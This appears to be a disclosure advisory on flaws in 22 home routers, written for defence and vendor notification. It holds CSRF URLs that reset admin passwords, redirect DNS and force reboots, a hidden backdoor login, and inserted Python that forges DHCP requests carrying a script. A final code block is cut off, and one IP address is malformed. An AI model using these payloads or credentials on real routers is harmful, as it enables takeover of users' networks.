Dear PacketStorm community,

We are a group of security researchers doing our IT Security Master's Thesis at Universidad Europea de Madrid. As part of the dissertation we have discovered multiple vulnerabilities in the following SOHO routers:

1. Observa Telecom AW4062
2. Comtrend WAP-5813n
3. Comtrend CT-5365
4. D-Link DSL-2750B
5. Belkin F5D7632-4
6. Sagem LiveBox Pro 2 SP
7. Amper Xavi 7968 and 7968+
8. Sagem Fast 1201
9. Linksys WRT54GL
10. Observa Telecom RTA01N
11. Observa Telecom Home Station BHS-RTA
12. Observa Telecom VH4032N
13. Huawei HG553
14. Huawei HG556a
15. Astoria ARV7510
16. Amper ASL-26555
17. Comtrend AR-5387un
18. Netgear CG3100D
19. Comtrend VG-8050
20. Zyxel P 660HW-B1A
21. Comtrend 536+
22. D-Link DIR-600

The vulnerabilities are:

- Persistent Cross Site Scripting (XSS) on #1, #2, #3, #6, #10, #12, #13, #14, #16, #17, #18, #19 and #20.
- Unauthenticated Cross Site Scripting on #3, #7, #8, #9, #10, #14, #16, #17 and #19.
- Cross Site Request Forgery (CSRF) on #1, #2, #3, #5, #10, #12, #13, #14, #15, #16, #18 and #20.
- Denial of Service (DoS) on #1, #5 and #10.
- Privilege Escalation on #1.
- Information Disclosure on #4 and #11.
- Backdoor on #10.
- Bypass Authentication using SMB Symlinks on #12.
- USB Device Bypass Authentication on #12, #13, #14 and #15.
- Bypass Authentication on #13 and #14.
- Universal Plug and Play related vulnerabilities on #2, #3, #4, #5, #6, #7, #10, #11, #12, #13, #14, #16, #21 and #22.

CVEs have been requested from MITRE and from other CNAs (MITRE has been very slow to assign them) and we are waiting for a response. OSVDB IDs have been assigned. Vendors and manufacturers have been notified. All routers have been physically tested.
============================================================================================
Manufacturer: Observa Telecom
Model: AW4062
Tested firmwares: 1.3.5.18 and 1.4.2 (latest)
Comments: Common router that the Spanish ISP Telefónica used to give away to its ADSL customers, especially during 2012.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Multiple cross-site scripting (XSS) flaws in the configuration menus of the router's web interface allow an attacker to execute malicious scripts in the browser of anyone who views the affected pages.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment. OSVDB-121211 (http://osvdb.org/show/osvdb/121211)
* PoC: The flaw lies in input fields that accept special characters and display the submitted value back on the page unescaped. For example, there is a vulnerable input field in the Domain Blocking page. Used legitimately, this field blocks traffic between the router and a given domain. An injected script is stored (persistent XSS) in the Domain column of the Domain Block Table and executes every time the victim opens the Domain Blocking page.
The same flaw exists in input fields of other pages, including Firewall/URL Blocking, Firewall/Port Forwarding, Services/DNS/Dynamic DNS and Advance/SNMP, among others. The most effective attack uses the Advance/SNMP page: a script injected into the System Name field is reflected on the home page, so it executes every time anyone connects to the router's web interface.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Every form in the web interface is vulnerable to Cross Site Request Forgery (CSRF); the PoC requests below are plain GET URLs that carry no anti-CSRF token.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment. OSVDB-121210 (http://osvdb.org/show/osvdb/121210), OSVDB-121212 (http://osvdb.org/show/osvdb/121212) and OSVDB-121214 (http://osvdb.org/show/osvdb/121214)
* PoC: For example, to check whether the victim is currently logged into the router, an attacker can make the victim's browser trigger a ping to an attacker-controlled address by sending the victim this URL:
http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88
An attacker can also change the router's default password by sending the victim this URL:
http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22
This URL makes the user with index 0 (always the user named 1234) change its default password from 1234 to 12345.
The following URL changes the victim's DNS servers to ones chosen by the attacker:
http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3=
Any action available in the web interface can be triggered through CSRF, including opening ports, changing the DHCP and NTP servers, modifying the wireless access point settings and enabling WPS.
--------------------------------------------------------------------------------------------
---------------------------------- Privilege Escalation ----------------------------------
* Description: Any user without administrator rights can escalate privileges by reading the router configuration file (config.xml). This file stores every configuration parameter, including the credentials of all users in plain text.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment. OSVDB-121213 (http://osvdb.org/show/osvdb/121213) and OSVDB-121285 (http://osvdb.org/show/osvdb/121285)
* PoC: A user without administrator rights (e.g. the account "user") connects to the router over FTP and can download both /etc/passwd and config.xml. Since config.xml stores every configuration parameter in plain text, including the credentials of all users, that user obtains the administrator password and gains administrator privileges. This is critical because few owners know there is a second account besides the administrator: they change only the administrator password and leave the "user" account with its default credentials (user:user), from which privileges can be escalated.
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service -----------------------------------
* Description: An attacker is able to carry out an external Denial of Service attack.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment.
* PoC: A Denial of Service can be triggered through CSRF:
http://192.168.1.1/goform/admin/formReboot
If a victim opens this URL, the router saves its configuration and reboots; the process takes about 60 seconds.
There are many other ways for an attacker to cause a Denial of Service by exploiting the CSRF vulnerabilities:
a) Create firewall rules that block certain URLs, IPs or MACs. A global deny rule that allows traffic only from/to selected IPs/MACs is also possible.
b) Delete the configuration the router needs to connect to the Internet Service Provider.
c) Disable the wireless interface so that no device can connect over 802.11.
d) Etc.
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: WAP-5813n (tested on Product Numbers 723306-104 and 723306-033)
Tested firmwares: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest)
Comments: Common router that the Spanish ISP Telefónica used to give away to its FTTH customers from 2011 to 2014.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields of the router's web interface are vulnerable to cross-site scripting (XSS), allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment. OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC: Although most input fields reject special characters, some still allow XSS. For example, the SSID field in Wireless>Basic accepts script code; the script executes in the Wireless>Security and Wireless>MAC Filter pages, where the SSID is displayed.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple CSRF vulnerabilities in the router's web interface allow an external attacker to perform actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment. OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and OSVDB-121217 (http://osvdb.org/show/osvdb/121217)
* PoC: Every input field is vulnerable to CSRF. When the administrator changes the password, the browser simply requests /password.cgi?adminPassword=newpassword. An attacker can send the victim the following URL to set the administrator password to 1234567890:
http://192.168.1.1/password.cgi?adminPassword=1234567890
To change the DNS servers, the attacker can have the victim open this link:
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker can modify firewall rules and cause a persistent denial of service through the device's Universal Plug and Play (UPnP) service.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC: The device supports UPnP. The protocol's actions require no authentication, so any host that can reach the service can invoke them. The device exposes actions such as changing the firewall rules (AddPortMapping) and terminating any WAN connection (ForceTermination). With these an attacker can cause a persistent denial of service (the router must be factory reset to work properly again) or open critical ports, even towards hosts outside the LAN.
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: CT-5365
Tested firmwares: A111-306TKF-C02_R16
Comments: Common router that the Spanish ISP Telefónica has given away to its FTTH customers since 2012.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields of the router's web interface are vulnerable to cross-site scripting (XSS), allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment. OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC: Although most input fields reject special characters, some still allow XSS. For example, the SSID field in Wireless>Basic accepts script code; the script executes in the Wireless>Security and Wireless>MAC Filter pages, where the SSID is displayed.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple CSRF vulnerabilities in the router's web interface allow an external attacker to perform actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignment. OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and OSVDB-121217 (http://osvdb.org/show/osvdb/121217)
* PoC: Every input field is vulnerable to CSRF. When the administrator changes the password, the browser simply requests /password.cgi?sysPassword=newpassword. An attacker can send the victim the following URL to set the administrator password to 1234567890:
http://192.168.1.1/password.cgi?sysPassword=1234567890
To change the DNS servers, the attacker can have the victim open this link:
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.56.61.35.88&dnsSecondary=80.58.61.34&dnsDinamic=0&dnsRefresh=1
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: An unauthenticated cross-site scripting (XSS) flaw allows an attacker to inject malicious code into the router's configuration pages by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignment. OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC: An attacker on the network segment served by the router's DHCP server can inject malicious code into the router's web pages without logging in, by sending a DHCP Request PDU whose Host Name option (option 12) contains the script. The router stores the value in the hostname column of the Connected Clients list (Device Info -> DHCP); the script executes as soon as the victim views that list.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker can modify firewall rules and cause a persistent denial of service through the device's Universal Plug and Play (UPnP) service.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC: The device supports UPnP. The protocol's actions require no authentication, so any host that can reach the service can invoke them. The device exposes actions such as changing the firewall rules (AddPortMapping) and terminating any WAN connection (ForceTermination). With these an attacker can cause a persistent denial of service (the router must be factory reset to work properly again) or open critical ports, even towards hosts outside the LAN.
============================================================================================
============================================================================================
Manufacturer: D-Link
Model: DSL-2750B
Tested firmwares: EU_1.01
Comments: -
--------------------------------------------------------------------------------------------
------------------ Information Disclosure (Insecure Object References) -------------------
* Description: An attacker can obtain sensitive information without being logged in.
* Report status: Reported to MITRE on 2015-03-25. Waiting for assignment. OSVDB-121219 (http://osvdb.org/show/osvdb/121219)
* PoC: Requesting http://192.168.1.1/hidden_info.html returns a large set of parameters, such as the SSID, the Wi-Fi password and the PIN code, without any login.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker can modify firewall rules and cause a persistent denial of service through the device's Universal Plug and Play (UPnP) service.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122384 (http://osvdb.org/show/osvdb/122384)
* PoC: UPnP is enabled by default on the device. The protocol's actions require no authentication, so any host that can reach the service can invoke them.
The device exposes actions such as changing the firewall rules (AddPortMapping) and terminating any WAN connection (ForceTermination). With these an attacker can cause a persistent denial of service (the router must be factory reset to work properly again) or open critical ports, even towards hosts outside the LAN.
============================================================================================
============================================================================================
Manufacturer: Belkin
Model: F5D7632-4
Tested firmwares: 6.01.04
Comments: -
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple CSRF vulnerabilities in the router's web interface allow an external attacker to perform malicious actions.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignment. OSVDB-121220 (http://osvdb.org/show/osvdb/121220)
* PoC: Every input field is vulnerable to CSRF. For example, to change the DNS servers an attacker can use the following URL:
http://192.168.2.1/cgi-bin/setup_dns.exe?page="setup_dns"&logout=""&dns1_1=37&dns1_2=252&dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service -----------------------------------
* Description: An attacker is able to carry out an external Denial of Service attack.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignment.
* PoC: A Denial of Service can be triggered through CSRF:
http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout=""
This URL reboots the router, dropping every active connection and denying service for about 20 seconds.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker can modify firewall rules and cause a persistent denial of service through the device's Universal Plug and Play (UPnP) service.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122389 (http://osvdb.org/show/osvdb/122389)
* PoC: The device supports UPnP. The protocol's actions require no authentication, so any host that can reach the service can invoke them. The device exposes actions such as changing the firewall rules (AddPortMapping) and terminating any WAN connection (ForceTermination). With these an attacker can cause a persistent denial of service (the router must be factory reset to work properly again) or open critical ports, even towards hosts outside the LAN.
============================================================================================
============================================================================================
Manufacturer: Sagem
Model: LiveBox 2 Pro
Tested firmwares: FAST3yyy_671288
Comments: Common router that the ISP Orange used to give away to its ADSL customers.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields of the router's web interface are vulnerable to cross-site scripting (XSS), allowing an attacker to execute malicious code even when the victim is not logged into the configuration pages.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on 2015-04-15. Waiting for assignment. OSVDB-121223 (http://osvdb.org/show/osvdb/121223)
* PoC: Although most input fields reject special characters, some still allow XSS.
1. The SSID field in "Configuración -> Equipos -> Personalizar" (Configuration -> Devices -> Personalize) accepts script code. The script executes in the "Configuración -> Equipos -> Mostrar" (Configuration -> Devices -> Show) page.
2. The SSID field in "Configuración -> LiveBox -> Configuracion Wifi -> SSID-name" (Configuration -> LiveBox -> Wi-Fi Configuration -> SSID-Name) accepts script code. The script executes on the main login page, even when the user is not logged in.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker can modify firewall rules and cause a persistent denial of service through the device's Universal Plug and Play (UPnP) service.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122387 (http://osvdb.org/show/osvdb/122387)
* PoC: UPnP is enabled by default on the device. The protocol's actions require no authentication, so any host that can reach the service can invoke them. The device exposes actions such as changing the firewall rules (AddPortMapping) and terminating any WAN connection (ForceTermination). With these an attacker can cause a persistent denial of service (the router must be factory reset to work properly again) or open critical ports, even towards hosts outside the LAN.
============================================================================================
============================================================================================
Manufacturer: Amper
Model: Xavi 7968 and Xavi 7968+
Tested firmwares: 3.01APT94 (latest)
Comments: Common router that the ISP Telefónica used to give away to its ADSL customers from 2010 to 2013.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: An unauthenticated cross-site scripting (XSS) flaw allows an attacker to inject malicious code into the router's configuration pages by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignment. OSVDB-121224 (http://osvdb.org/show/osvdb/121224)
* PoC: An attacker on the network segment served by the router's DHCP server can inject malicious code into the router's web pages without logging in, by sending a DHCP Request PDU whose Host Name option (option 12) contains the script. The router stores the value in the hostname column of the Connected Clients list (/webconfig/status/dhcp_table.html); the script executes as soon as the victim views that list.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker can modify the WPS configuration through the device's Universal Plug and Play (UPnP) service.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122388 (http://osvdb.org/show/osvdb/122388)
* PoC: UPnP is enabled by default on the device. The protocol's actions require no authentication, so any host that can reach the service can invoke them. The device exposes actions that change the WPS configuration or reset the access point to its default settings.
============================================================================================
============================================================================================
Manufacturer: Sagem
Model: Fast 1201
Tested firmwares: 3.01APT94 (latest)
Comments: -
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: An unauthenticated cross-site scripting (XSS) flaw allows an attacker to inject malicious code into the router's configuration pages by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignment. OSVDB-121222 (http://osvdb.org/show/osvdb/121222)
* PoC: An attacker on the network segment served by the router's DHCP server can inject malicious code into the router's web pages without logging in, by sending a DHCP Request PDU whose Host Name option (option 12) contains the script. The router stores the value in the hostname column of the DHCP Leases list (dhcpinfo.html); the script executes as soon as the victim views that list.
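The DHCP-hostname injection described for the CT-5365, Xavi 7968 and Fast 1201 above, and reported again for the WRT54GL and RTA01N below, as an added example that is not part of the advisory or of any vendor's firmware. It forges a DHCPREQUEST whose Host Name option (option 12, RFC 2132) carries the script, parses the option area back the way a router's DHCP server would, and renders the lease-table row both unescaped (the affected behaviour) and escaped, next to the hostname validation the router should have applied. The MAC address, requested IP, payload and the `send_broadcast` helper are constructed for this example; `demo()` never touches the network.

```python
import html
import re
import socket
import struct

DHCP_MAGIC = b"\x63\x82\x53\x63"  # RFC 2131 options magic cookie
OPT_PAD, OPT_HOSTNAME, OPT_REQUESTED_IP, OPT_MSG_TYPE, OPT_END = 0, 12, 50, 53, 255
DHCPREQUEST = 3

# Constructed payload: a harmless marker that proves script execution.
PAYLOAD = "<script>alert('dhcp')</script>"


def build_dhcp_request(client_mac: bytes, requested_ip: str, hostname: str,
                       xid: int = 0x3903F326) -> bytes:
    """Return a minimal DHCPREQUEST: 236-byte fixed header, cookie, options."""
    name = hostname.encode("utf-8")
    if len(client_mac) != 6:
        raise ValueError("client_mac must be 6 bytes")
    if not 1 <= len(name) <= 255:
        raise ValueError("option 12 length must fit in one byte")
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        1, 1, 6, 0,                   # op=BOOTREQUEST, htype=Ethernet, hlen, hops
        xid, 0, 0x8000,               # xid, secs, flags (broadcast reply)
        b"\0" * 4, b"\0" * 4,         # ciaddr, yiaddr
        b"\0" * 4, b"\0" * 4,         # siaddr, giaddr
        client_mac.ljust(16, b"\0"),  # chaddr
        b"\0" * 64, b"\0" * 128,      # sname, file
    )
    options = (
        bytes([OPT_MSG_TYPE, 1, DHCPREQUEST])
        + bytes([OPT_REQUESTED_IP, 4]) + socket.inet_aton(requested_ip)
        + bytes([OPT_HOSTNAME, len(name)]) + name   # the injected value
        + bytes([OPT_END])
    )
    return header + DHCP_MAGIC + options


def parse_dhcp_options(packet: bytes) -> dict:
    """Parse the TLV option area into {code: raw_value}, as a DHCP server does."""
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet")
    options, i = {}, 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_END:
            break
        if code == OPT_PAD:
            i += 1
            continue
        length = packet[i + 1]
        options[code] = packet[i + 2:i + 2 + length]
        i += 2 + length
    return options


# RFC 1123 label syntax: letters, digits and inner hyphens only.
_HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def hostname_is_valid(name: str) -> bool:
    """Validation the router should apply before storing a lease name."""
    return len(name) <= 253 and bool(_HOSTNAME_RE.match(name))


def render_lease_row(hostname: str, ip: str, mac: str, escape: bool) -> str:
    """One row of the DHCP clients table. escape=False mirrors the affected
    firmwares, which echo the hostname into the page verbatim."""
    cell = html.escape(hostname, quote=True) if escape else hostname
    return f"<tr><td>{cell}</td><td>{ip}</td><td>{mac}</td></tr>"


def send_broadcast(packet: bytes) -> None:
    """Put the packet on the wire (needs privileges to bind UDP/68). Not called by demo()."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        sock.bind(("0.0.0.0", 68))
        sock.sendto(packet, ("255.255.255.255", 67))


def demo() -> dict:
    """Build, parse and render offline; returns what the router would store and show."""
    packet = build_dhcp_request(b"\x00\x11\x22\x33\x44\x55", "192.168.1.50", PAYLOAD)
    name = parse_dhcp_options(packet)[OPT_HOSTNAME].decode("utf-8", "replace")
    return {
        "packet_len": len(packet),
        "hostname": name,
        "valid": hostname_is_valid(name),
        "vulnerable_row": render_lease_row(name, "192.168.1.50", "00:11:22:33:44:55", False),
        "hardened_row": render_lease_row(name, "192.168.1.50", "00:11:22:33:44:55", True),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

To reproduce against a test device, call `send_broadcast(build_dhcp_request(...))` from a host on the router's LAN; binding UDP/68 needs root or CAP_NET_BIND_SERVICE, and some DHCP servers only record a lease after a full DISCOVER/OFFER/REQUEST exchange, in which case a DISCOVER (message type 1) with the same option 12 has to go first. On the defensive side, rejecting names that fail `hostname_is_valid` stops the injection at the DHCP server, and escaping in `render_lease_row` stops it in the page even if an invalid name slips through.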
============================================================================================
============================================================================================
Manufacturer: Linksys
Model: WRT54GL
Tested firmwares: 4.30.16 build 6
Comments: -
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: An unauthenticated cross-site scripting (XSS) flaw allows an attacker to inject malicious code into the router's configuration pages by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignment. OSVDB-121221 (http://osvdb.org/show/osvdb/121221)
* PoC: An attacker on the network segment served by the router's DHCP server can inject malicious code into the router's web pages without logging in, by sending a DHCP Request PDU whose Host Name option (option 12) contains the script. The router stores the value in the hostname column of the Connected Clients list (DHCPTable.asp), reachable either directly by URL or through Status -> Local Network -> DHCP Clients Table; the script executes as soon as the victim views that list.
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: RTA01N
Tested firmwares: RTK_V2.2.13
Comments: Common router that the Spanish ISP Telefónica used to give away to its ADSL/VDSL customers.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Multiple cross-site scripting (XSS) flaws in the configuration menus of the router's web interface allow an attacker to execute malicious scripts.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121787 (http://osvdb.org/show/osvdb/121787) and OSVDB-121788 (http://osvdb.org/show/osvdb/121788)
* PoC: The flaw lies in input fields that accept special characters and display the submitted value back on the page unescaped. For example, the "Nombre del host" (Hostname) field in Servicio -> DDNS (Service -> DDNS, /ddns.htm) is vulnerable. Another vulnerable field is in Mantenimiento -> Contraseña (Maintenance -> Password, /userconfig.htm): after creating a user whose username contains the script, it is stored in the User Accounts table and executes whenever the victim opens that page.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF).
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121786 (http://osvdb.org/show/osvdb/121786)
* PoC: For example, to change the DNS servers an attacker can have the victim open this link:
http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicar cambios"
An attacker can also change the administrator password by sending the victim this URL:
http://192.168.1.1/form2userconfig.cgi?username="1234"&privilege=2&oldpass="1234"&newpass="newpass"&confpass="newpass"&modify="Modificar"&select="s0"&hiddenpass="1234"&submit.htm?userconfig.htm="Send"
This URL makes the administrator user (always the user named 1234) change its default password from 1234 to newpass.
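Why every one of the CSRF URLs in this advisory works (the goform handlers on the AW4062, password.cgi and dnscfg.cgi on the Comtrend units, setup_dns.exe and restart.exe on the Belkin, and form2Dns.cgi above), as an added example that is neither the advisory's nor any vendor's code: a model of the form2Dns.cgi handler that, like the affected firmware, accepts a state-changing GET on the strength of the session cookie alone, next to a hardened version that requires POST, a same-origin Origin/Referer header, and a per-session token. The session store, the placeholder DNS values and the attacker origin are constructed for this example, and the quotes around the PoC parameter values have been dropped; the endpoint path and parameter names are the advisory's.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"
# The advisory's PoC request (quoting around the values simplified).
ATTACKER_URL = ("http://192.168.1.1/form2Dns.cgi"
                "?dnsMode=1&dns1=37.252.96.88&dns2=37.252.96.89&dns3=")


class Router:
    """Session cookie -> per-session CSRF token, plus the setting we protect."""

    def __init__(self):
        self.dns = ["0.0.0.0", "0.0.0.0"]   # constructed placeholder defaults
        self.sessions = {}

    def login(self) -> str:
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = secrets.token_hex(16)
        return cookie

    def csrf_token(self, cookie: str) -> str:
        return self.sessions[cookie]


def _same_origin(url: str, origin: str) -> bool:
    a, b = urlsplit(url), urlsplit(origin)
    return (a.scheme, a.hostname, a.port or 80) == (b.scheme, b.hostname, b.port or 80)


def _apply_dns(router: Router, params: dict) -> None:
    router.dns = [params.get("dns1", [""])[0], params.get("dns2", [""])[0]]


def vulnerable_form2dns(router, method, url, headers, cookie):
    """Mirrors the affected firmware: a valid session cookie is the only check.
    Browsers attach that cookie to cross-site GETs, so an <img src=...> on any
    page the victim visits changes the DNS servers. method/headers are ignored."""
    if cookie not in router.sessions:
        return 401, "login required"
    _apply_dns(router, parse_qs(urlsplit(url).query))
    return 200, "OK"


def hardened_form2dns(router, method, url, headers, cookie, body):
    """Three independent checks: POST only, Origin/Referer must be the router
    itself, and the form must carry the token bound to this session."""
    if cookie not in router.sessions:
        return 401, "login required"
    if method != "POST":
        return 405, "state change requires POST"
    source = headers.get("Origin") or headers.get("Referer")
    if source is None or not _same_origin(source, ROUTER_ORIGIN):
        return 403, "cross-site request rejected"
    form = parse_qs(body)
    token = form.get("csrf", [""])[0]
    if not hmac.compare_digest(token, router.csrf_token(cookie)):
        return 403, "bad or missing CSRF token"
    _apply_dns(router, form)
    return 200, "OK"


def demo() -> dict:
    """Replay the PoC against both handlers and report what each did."""
    evil = {"Referer": "http://evil.example/"}
    vuln = Router()
    c = vuln.login()
    vuln_status, _ = vulnerable_form2dns(vuln, "GET", ATTACKER_URL, evil, c)

    hard = Router()
    c2 = hard.login()
    get_status, _ = hardened_form2dns(hard, "GET", ATTACKER_URL, evil, c2, "")
    post_status, _ = hardened_form2dns(
        hard, "POST", ROUTER_ORIGIN + "/form2Dns.cgi", {"Origin": "http://evil.example"},
        c2, "dns1=37.252.96.88&dns2=37.252.96.89")
    legit_body = f"dns1=192.0.2.1&dns2=192.0.2.2&csrf={hard.csrf_token(c2)}"
    legit_status, _ = hardened_form2dns(
        hard, "POST", ROUTER_ORIGIN + "/form2Dns.cgi", {"Origin": ROUTER_ORIGIN}, c2, legit_body)
    return {
        "vulnerable": (vuln_status, vuln.dns),
        "hardened_get": get_status,
        "hardened_cross_site_post": post_status,
        "hardened_legit_post": (legit_status, hard.dns),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The origin check alone is not enough, because browsers may omit Referer and older ones omit Origin, which is why the token check is there as well; the method check alone is not enough either, since a cross-site auto-submitting form can POST. The reboot URLs used for the Denial of Service findings need exactly the same treatment.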
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service -----------------------------------
* Description: An attacker is able to carry out an external Denial of Service attack.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
* PoC: A Denial of Service can be triggered through CSRF:
http://192.168.1.1/form2Reboot.cgi?rebootMode=0&reboot="Reiniciar"&submit.htm?reboot.htm="Send"
If a victim opens this URL, the router replies with an HTTP 200 OK status code and reboots.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: An unauthenticated cross-site scripting (XSS) flaw allows an attacker to inject malicious code into the router's configuration pages by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121789 (http://osvdb.org/show/osvdb/121789)
* PoC: An attacker on the network segment served by the router's DHCP server can inject malicious code into the router's web pages without logging in, by sending a DHCP Request PDU whose Host Name option (option 12) contains the script. The router stores the value in the DHCP Active Clients table (/dhcptbl.html); the script executes as soon as the victim views that list.
--------------------------------------------------------------------------------------------
----------------------------------------- Backdoor ---------------------------------------
* Description: There is a second default administrator account that is hidden from the legitimate owner of the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121785 (http://osvdb.org/show/osvdb/121785)
* PoC: Besides the well-known 1234 administrator user there is another one, named admin, whose password is 7449airocon. This superuser does not appear anywhere in the web interface (it shows up only in the backup configuration XML file) and can modify any setting, either through the web interface or through telnet.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker can modify firewall rules, cause a persistent denial of service and obtain the WLAN passwords, among other things, through the device's Universal Plug and Play (UPnP) service.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC: The device supports UPnP. The protocol's actions require no authentication, so any host that can reach the service can invoke them. The device exposes actions such as changing the firewall rules (AddPortMapping) and terminating any WAN connection (ForceTermination). With these an attacker can cause a persistent denial of service (the router must be factory reset to work properly again) or open critical ports, even towards hosts outside the LAN. The attacker can also change the WPS configuration settings, reset the access point to its defaults and obtain sensitive information such as the WLAN passwords.
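The unauthenticated UPnP exchange that the Universal Plug and Play findings in this advisory rely on (WAP-5813n, CT-5365, DSL-2750B, F5D7632-4, LiveBox 2 Pro, Xavi 7968, RTA01N, and the BHS-RTA below), as an added example that is not the advisory's or any vendor's code. It shows the SSDP M-SEARCH and reply parsing, the SOAP control envelope for AddPortMapping and ForceTermination on WANIPConnection:1 (no credentials exist anywhere in the exchange), and the policy a hardened Internet Gateway Device would apply before honouring such a request. The SSDP reply, LAN prefix, addresses and the `send_control` helper are constructed or assumed for this example; the WPS and WLAN-password actions the advisory mentions for the Xavi and RTA01N are not named on the page and are not modelled. `demo()` runs offline.

```python
import html
import http.client
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

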